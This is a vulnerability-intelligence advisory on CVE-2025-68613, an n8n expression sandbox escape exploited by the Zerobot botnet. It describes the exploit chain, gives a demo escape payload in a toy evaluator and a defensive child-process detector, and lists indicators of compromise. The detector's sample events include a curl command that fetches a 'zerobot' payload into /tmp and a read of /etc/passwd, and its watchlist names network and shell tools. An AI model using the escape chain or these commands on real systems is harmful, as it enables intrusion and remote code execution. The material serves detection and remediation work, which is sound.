CVE-2025-68613: Zerobot botnet exploits critical vulnerability impacting n8n AI orchestration platform
Zerobot, a Mirai-based botnet known for targeting Internet of Things (IoT) devices, has leveraged a critical vulnerability tracked as CVE-2025-68613 to compromise instances of the n8n workflow automation platform. Successful exploitation requires authentication and results in remote code execution (RCE) with the privileges of the n8n process. The vulnerability carries a critical Common Vulnerability Scoring System version 3.1 (CVSSv3.1) score of 9.9, reflecting network reachability, low attack complexity, low privileges required and high impact on confidentiality, integrity and availability. Our Vulnerability Intelligence researchers have observed a publicly available Metasploit module for CVE-2025-68613 and note that the vulnerability has been weaponized and productized. We provide recommendations and mitigations below.
On Dec. 19, 2025, n8n developers published a security advisory addressing a critical improper control of dynamically managed code resources vulnerability tracked as CVE-2025-68613. Successful exploitation requires authentication against the n8n instance and results in RCE. Active exploitation was first identified in mid-January 2026, when Akamai's security intelligence and response team observed the Zerobot botnet leveraging the vulnerability, the first publicly reported exploitation since disclosure. On March 11, 2026, CISA added CVE-2025-68613 to its Known Exploited Vulnerabilities (KEV) catalog, setting a remediation due date of March 25, 2026, for federal agencies.
Our Vulnerability Intelligence team observed 71,537 exposed n8n instances worldwide as of March 16, 2026, using a Shodan query; Figure 1 shows the results.
Figure 1: The image depicts discovered exposed instances of n8n on the Shodan internet scanning platform as of March 16, 2026.
n8n is workflow automation software built on Node.js; both the platform internals and workflow logic are written in JavaScript. The vulnerability exists in n8n's expression evaluation system, which lets users write expressions that are evaluated at run time against the data flowing through a workflow. For example, a workflow that sends a personalized email to a user can use a JavaScript expression to insert user-specific data into the message.
By design, the expression evaluation system runs input supplied by an authenticated user. Features of this kind attract attackers and vulnerability researchers alike because they place user input directly in a code execution context.
In vulnerable instances, an expression injection lets authenticated attackers execute arbitrary commands. The root cause is that n8n versions 0.211.0 through 1.120.3 do not properly sandbox the expression evaluation system, so an attacker can break out of the intended execution context and run arbitrary code on the underlying server with the privileges of the n8n process. The following is an example payload that can be used to exploit this vulnerability:
The payload wraps the exploit chain inside an anonymous function so that the whole chain fits in a single expression. It first uses "this" to reach the Node.js global context, then traverses to process.mainModule, the root module of the application, which should be unreachable from within the sandbox. From there, require('child_process') loads the Node.js module for spawning processes on the underlying operating system, which is used to run the "id" command. An attacker who reaches this point has command execution on the host and can attempt further privilege escalation or lateral movement from it.
Intel 471 tested and confirmed the payload successfully running arbitrary commands on a vulnerable n8n instance. The following screenshot showcases the successful execution of the “id” command inside the n8n platform:
Figure 2: The image depicts the successful execution of the “id” command inside the n8n platform on March 18, 2026.
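To make the escape described above concrete, the following is an added example and not n8n's code: a minimal "{{ expression }}" template evaluator written two ways. The unsafe form hands the expression text to the JavaScript engine, which is the class of mistake the advisory describes, and the payload shape from the text (an anonymous function reaching the global object through "this") escapes it; the hardened form only resolves dotted data paths and never compiles user text. The evaluator, the sample workflow data and the payload are all constructed here; the demo stops at reading process.pid instead of continuing to process.mainModule.require('child_process'), so it proves reach into the process without spawning a command.

```javascript
// Added example, not n8n's implementation. A toy "{{ expr }}" interpolator in
// an unsafe and a hardened form. All data and payloads below are constructed.

const EXPR_RE = /\{\{\s*([\s\S]*?)\s*\}\}/g;

// Unsafe pattern: the expression text is compiled as JavaScript.
// new Function builds a sloppy-mode function in global scope, so an inner
// `function () { return this }` evaluates to globalThis regardless of how
// the surrounding module is loaded.
function renderUnsafe(template, $json) {
  return template.replace(EXPR_RE, (_, expr) => {
    const fn = new Function('$json', `return (${expr});`);
    return String(fn($json));
  });
}

// Hardened pattern: accept only `$json` followed by identifier segments,
// resolve them against the data object with own-property checks, and never
// pass user text to the engine. Anything else is rejected outright.
const PATH_RE = /^\$json(?:\.[A-Za-z_][A-Za-z0-9_]*)*$/;

function resolvePath(expr, $json) {
  if (!PATH_RE.test(expr)) {
    throw new Error(`rejected expression: ${expr}`);
  }
  const parts = expr.split('.').slice(1); // drop the leading $json
  let cur = $json;
  for (const key of parts) {
    // Own-property check blocks walks into constructor, __proto__, etc.
    if (cur === null || typeof cur !== 'object' || !Object.hasOwn(cur, key)) {
      throw new Error(`unknown field: ${key}`);
    }
    cur = cur[key];
  }
  return cur;
}

function renderSafe(template, $json) {
  return template.replace(EXPR_RE, (_, expr) => String(resolvePath(expr, $json)));
}

// Constructed sample data, a benign template and an escape payload in the
// shape described in the text. The real chain continues through
// process.mainModule.require('child_process'); this demo reads process.pid.
const SAMPLE_JSON = { name: 'Alice', address: { city: 'Berlin' } };
const BENIGN = 'Hello {{ $json.name }} from {{ $json.address.city }}';
const ESCAPE = '{{ (function () { return this.process.pid; })() }}';

function demo() {
  const results = {
    benignUnsafe: renderUnsafe(BENIGN, SAMPLE_JSON),
    benignSafe: renderSafe(BENIGN, SAMPLE_JSON),
    // The unsafe evaluator returns the Node.js process id: the sandbox is gone.
    escapeUnsafe: renderUnsafe(ESCAPE, SAMPLE_JSON),
    escapeSafe: null,
  };
  try {
    renderSafe(ESCAPE, SAMPLE_JSON);
  } catch (e) {
    results.escapeSafe = e.message; // the hardened evaluator rejects the payload
  }
  return results;
}
```

The point of the hardened form is not a "better sandbox": Node.js offers no in-process sandbox that holds against user-supplied code, so the safe design is a grammar the evaluator fully controls, with the data object as the only thing the expression can name.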
CVE-2025-68613 garnered significant attention in the underground, including from bot actors who often highlight notable vulnerabilities. We’ve observed multiple threat actors, including a possible ransomware operator, share links to an exploit from open source reporting.
We observed broad awareness of CVE-2025-68613 among potential attackers, and exploitation in the wild has been confirmed. Successful exploitation requires authentication, which is a limiting factor, but not a substantial one: credentials can be obtained through open registration, brute forcing or credential stuffing, or the vulnerability can be chained with CVE-2026-21858, also known as ni8mare, to achieve initial access. The large number of internet-exposed n8n instances widens the attack surface further, and the public Metasploit module lowers the technical barrier, enabling less sophisticated threat actors to weaponize the vulnerability with minimal effort. These factors, combined with a CVSSv3.1 score of 9.9, suggest a medium likelihood of continued exploitation.
The Vulnerability Intelligence team proactively tracks the threat life cycles of vulnerabilities and exploit activity observed in the cyber underground, helping illuminate vulnerabilities at a greater risk of exploitation. Timely alerts help teams immediately see changes in a vulnerability's threat level, enabling decisive and prioritized remediation based on real and active threats.
The vulnerability is addressed in the updated versions listed in the n8n security advisory; upgrade to a fixed version. Intel 471 also recommends monitoring for unexpected child processes spawned by the n8n process, particularly system commands such as "id" and "whoami" or tools that can act as payload downloaders such as wget and curl, as these indicate active exploitation attempts. Verity471 customers can access an available Sigma rule and Nuclei template.
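The child-process monitoring recommended above, as an added example that is not part of the advisory or the Sigma rule it mentions: a small detector over process-creation events that walks each process's parent chain to the n8n process and rates any non-n8n descendant. The JSON-lines event shape (ts, pid, ppid, comm, cmdline), the n8n install path, the watchlist and the events themselves are all constructed assumptions; map the fields from whatever your EDR, auditd or eBPF pipeline emits.

```javascript
// Added example, not Intel 471's rule. Detects child processes of an n8n
// process from constructed process-creation events and rates them.

// Commands the advisory calls out plus common shells and interpreters.
const WATCHLIST = new Set(['id', 'whoami', 'uname', 'curl', 'wget', 'nc', 'sh', 'bash', 'python3', 'perl']);

// Constructed events. pid 4100 is the n8n process; 203.0.113.5 is a
// documentation (TEST-NET-3) address, not a real indicator.
const SAMPLE_EVENTS = [
  '{"ts":"2026-03-18T10:00:01Z","pid":900,"ppid":1,"comm":"cron","cmdline":"/usr/sbin/cron -f"}',
  '{"ts":"2026-03-18T10:00:01Z","pid":4100,"ppid":1,"comm":"node","cmdline":"node /opt/n8n/bin/n8n start"}',
  '{"ts":"2026-03-18T10:00:05Z","pid":4120,"ppid":4100,"comm":"sh","cmdline":"sh -c id"}',
  '{"ts":"2026-03-18T10:00:05Z","pid":4121,"ppid":4120,"comm":"id","cmdline":"id"}',
  '{"ts":"2026-03-18T10:00:09Z","pid":4122,"ppid":4100,"comm":"curl","cmdline":"curl -s http://203.0.113.5/zerobot -o /tmp/.x"}',
  '{"ts":"2026-03-18T10:00:12Z","pid":4130,"ppid":900,"comm":"sh","cmdline":"sh -c /usr/sbin/logrotate /etc/logrotate.conf"}',
  '{"ts":"2026-03-18T10:00:15Z","pid":4141,"ppid":4100,"comm":"cat","cmdline":"cat /etc/passwd"}',
];

// An n8n process is a node process whose command line names the n8n binary.
function isN8nProcess(ev) {
  return ev.comm === 'node' && /\bn8n\b/.test(ev.cmdline);
}

// Walk ppid links upward until an n8n process or the root is reached.
// The seen-set guards against cycles from pid reuse in partial captures.
function findN8nAncestor(ev, byPid) {
  const seen = new Set();
  let cur = byPid.get(ev.ppid);
  while (cur && !seen.has(cur.pid)) {
    if (isN8nProcess(cur)) return cur;
    seen.add(cur.pid);
    cur = byPid.get(cur.ppid);
  }
  return null;
}

// Basename of the program, looking through `sh -c "<cmd>"` to the command
// the shell was asked to run, since child_process.exec spawns via a shell.
function effectiveCommand(cmdline) {
  const argv = cmdline.trim().split(/\s+/);
  const prog = argv[0].split('/').pop();
  if ((prog === 'sh' || prog === 'bash' || prog === 'dash') && argv[1] === '-c' && argv[2]) {
    return argv[2].replace(/^['"]|['"]$/g, '').split('/').pop();
  }
  return prog;
}

// Returns one alert per process that descends from an n8n process.
// Watchlisted commands are high severity; anything else is medium, because a
// workflow engine spawning arbitrary binaries is itself unusual.
function detect(lines) {
  const events = lines.map((l) => JSON.parse(l));
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const alerts = [];
  for (const ev of events) {
    if (isN8nProcess(ev)) continue;
    const root = findN8nAncestor(ev, byPid);
    if (!root) continue;
    const command = effectiveCommand(ev.cmdline);
    alerts.push({
      ts: ev.ts,
      pid: ev.pid,
      n8nPid: root.pid,
      command,
      severity: WATCHLIST.has(command) ? 'high' : 'medium',
    });
  }
  return alerts;
}
```

Running detect over the sample yields four alerts: the sh -c id wrapper and the id it spawns, the curl download and the cat read, while the logrotate job under cron is ignored because its parent chain never reaches n8n. Tune the n8n matcher to your deployment (container images and the desktop app have different command lines) before relying on it.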
| Indicator Type | Indicator Value |
|---|---|
| IP address | 103.59.160.237 |
| IP address | 140.233.190.96 |
| IP address | 144.172.100.228 |
| IP address | 172.86.123.179 |
| IP address | 216.126.227.101 |
| Domain | 0bot.qzz.io |
| URL (host and path) | andro.notemacro.com/inihiddenngentod/zerobotv9 |
| URL (host and path) | pivot.notemacro.com/inihiddenngentod/zerobotv9 |
| SHA-256 | c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f |
| SHA-256 | 360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da |
| SHA-256 | cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24 |
| SHA-256 | 045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57 |
| SHA-256 | d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7 |
| SHA-256 | deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060 |
| SHA-256 | 6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e |
| SHA-256 | 2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3 |
| SHA-256 | 263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c |
| SHA-256 | d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616 |